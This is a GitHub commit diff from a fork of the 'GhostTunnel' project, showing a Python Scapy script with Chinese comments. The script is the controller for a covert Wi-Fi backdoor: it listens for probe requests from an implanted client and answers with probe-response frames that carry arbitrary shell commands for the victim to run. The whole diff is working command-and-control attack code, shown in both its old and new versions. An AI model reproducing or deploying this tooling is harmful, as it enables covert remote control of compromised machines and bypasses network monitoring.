forked from BaiZhanJi0x0/GhostTunnel
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
7e7631c
commit 1d29284
Showing
1 changed file
with
72 additions
and
74 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,82 +1,80 @@ | ||
| #coding:utf-8 | ||
| #!usr/bin/python | ||
| #coding=utf-8 | ||
| import sys, getopt | ||
| from scapy.all import * | ||
| import binascii | ||
| import time | ||
|
|
||
| #设置ssid和监听设备名 | ||
| netSSID = 'ghost' #Network name here | ||
| iface = 'wlan0' #Interface name here | ||
| #need modify /usr/lib/python2.7/dist-packages/scapy 252,262 | ||
|
|
||
| #Scapy参考设置 | ||
| #beacon = Dot11Beacon(cap='ESS+privacy') | ||
| #essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) | ||
| #rsn = Dot11Elt(ID='RSNinfo', info=( | ||
| #'\x01\x00' #RSN Version 1 | ||
| #'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP | ||
| #'\x02\x00' #2 Pairwise Cipher Suites (next two lines) | ||
| #'\x00\x0f\xac\x04' #AES Cipher | ||
| #'\x00\x0f\xac\x02' #TKIP Cipher | ||
| #'\x01\x00' #1 Authentication Key Managment Suite (line below) | ||
| #'\x00\x0f\xac\x02' #Pre-Shared Key | ||
| #'\x00\x00')) #RSN Capabilities (no extra capabilities) | ||
| class Tools: | ||
| netSSID = 'ghost' #Network name | ||
| @staticmethod | ||
| def getPayloadFrame(cmd, ct_addr2, addr2): | ||
| payload = Dot11Elt(ID=221, info=('\x63\x63\x63'+cmd)) | ||
| response_dot11 = Dot11(subtype=5, addr1=ct_addr2,addr2=addr2, addr3=addr2,SC=22222) | ||
| return RadioTap()/response_dot11/Dot11ProbeResp()/payload/Dot11Elt(ID='SSID', info=Tools.netSSID) | ||
| @staticmethod | ||
| def getTimeHash(): | ||
| hash_time = str(hash(time.time()))[0:8] | ||
| return hash_time | ||
| @staticmethod | ||
| def CMDEncode(cmd): | ||
| cmd_bin = "" | ||
| for i in cmd: | ||
| cmd_bin += binascii.a2b_hex(hex(ord(i))[2:4]) | ||
| cmd_bin += '\0' | ||
| return cmd_bin | ||
|
|
||
| class Action1: | ||
| def __init__(self): | ||
| self.ReceiveHash = None; | ||
| self.SendHash = None; | ||
| self.number = 0; | ||
| def Handle(self,packet): | ||
| dot = packet.getlayer(Dot11) | ||
| if dot != None and dot.type == 0 and dot.subtype == 4: | ||
| data = str(packet) | ||
| index = data.find("ac1") | ||
| if index>= 0: | ||
| print("Get Frame!(0-11): " + data[index:index+11]) | ||
| self.ReceiveHash = data[index+3:index+11] | ||
| ct_addr2 = packet.addr2 | ||
| if(self.SendHash == None): | ||
| self.SendHash = Tools.getTimeHash() | ||
| cmd_bin = Tools().CMDEncode(self.SendHash+SendCMD) | ||
| if(self.SendHash != self.ReceiveHash ): | ||
| self.number += 1; | ||
| print("Round ["+str(self.number)+"] : Context is {"+cmd_bin+"} "), | ||
| response_frame = Tools.getPayloadFrame(cmd_bin, ct_addr2, '22:22:22:22:22:22') | ||
| sendp(response_frame, iface="wlan0", count=500) | ||
| else: | ||
| self.SendHash = None; | ||
| self.number = 0; | ||
| print("=====Attack OK!!!======") | ||
| exit(1); | ||
|
|
||
| #命令获取函数 | ||
| def getCmd(): | ||
| cmd = raw_input("input the command to excute:\n") | ||
| #cmd_b = "cmd /c notepad" | ||
| #处理命令编码,转为16进制 | ||
| cmd_b = "" | ||
| for i in cmd: | ||
| cmd_b += binascii.a2b_hex(hex(ord(i))[2:4]) | ||
| cmd_b += '\0' | ||
| print(cmd_b) | ||
| return cmd_b | ||
| def getTimeHash(): | ||
| hash_time = str(hash(time.time()))[0:8] | ||
| print hash_time | ||
| return hash_time | ||
| #封装为dot11完整帧 | ||
| def getPayloadFrame(cmd, ct_addr2, addr2, addr3): | ||
| payload = Dot11Elt(ID=221, info=('\x63\x63\x63'+getTimeHash()+cmd)) #命令封装为dot11elt帧 | ||
| response_dot11 = Dot11(subtype=5, addr1=ct_addr2, | ||
| addr2=addr2, addr3=addr2,SC=22222) | ||
| return RadioTap()/response_dot11/Dot11ProbeResp()/payload/Dot11Elt(ID='SSID', info="ghost") | ||
|
|
||
| #发送包含控制指令的dot11帧 | ||
| def sendCmd(frame): | ||
| for i in range(0,3): | ||
| sendp(frame, iface=iface, count=500) | ||
|
|
||
| #处理控制函数 | ||
| def handle(packet): | ||
|
|
||
| dot = packet.getlayer(Dot11) | ||
| #print(dot) | ||
| if dot!=None and dot.type==0 and dot.subtype==4: | ||
| #帧数据转为字符串 | ||
| data=str(packet) | ||
| #寻找客户端request帧携带的特定标识 | ||
|
|
||
| if data.find("command")>=0: | ||
| # packet.show() | ||
| print("#wake up#\n") | ||
| #获取上线被控端的MAC地址 | ||
| ct_addr2 = packet.addr2 | ||
| #要执行的命令 | ||
| cmd = getCmd(); | ||
| #命令封装为802.11完整帧 | ||
| #参数1:执行的命令 | ||
| #参数2:目标端的MAC地址 | ||
| #参数3、4:发送帧中的addr2和addr3的MAC地址 | ||
| response_frame = getPayloadFrame(cmd, ct_addr2, '22:22:22:22:22:22', '33:33:33:33:33:33') | ||
| #发送包含控制命令的Response帧 | ||
| #sendCmd(response_frame) | ||
| sendp(response_frame, iface=iface, count=700) | ||
| #这里只要发送完毕既退出 | ||
| #exit(1) | ||
|
|
||
| if __name__ == "__main__": | ||
| print("waiting for wake up.......") | ||
| #监听函数 | ||
| sniff(iface=iface, prn=handle) | ||
| SendCMD = "" | ||
| opts, args = getopt.getopt(sys.argv[1:], "hc:") | ||
| for op, value in opts: | ||
| if op == "-c": | ||
| try: | ||
| SendCMD += value | ||
| for j in args: | ||
| SendCMD = SendCMD+" "+j | ||
| print(SendCMD) | ||
| act1 = Action1() | ||
| #print("You input command is :[" + SendCMD+"]") | ||
| print("=====Attack Begin======") | ||
| print("Sniff Monitor...") | ||
| sniff(iface="wlan0", prn=act1.Handle) | ||
| except: | ||
| #print("Please try again later") | ||
| pass | ||
| elif op == "-h": | ||
| print(''' | ||
| ---------------------------------- | ||
| Ghost Tunnel Tools Manual... | ||
| ---------------------------------- | ||
| ''') |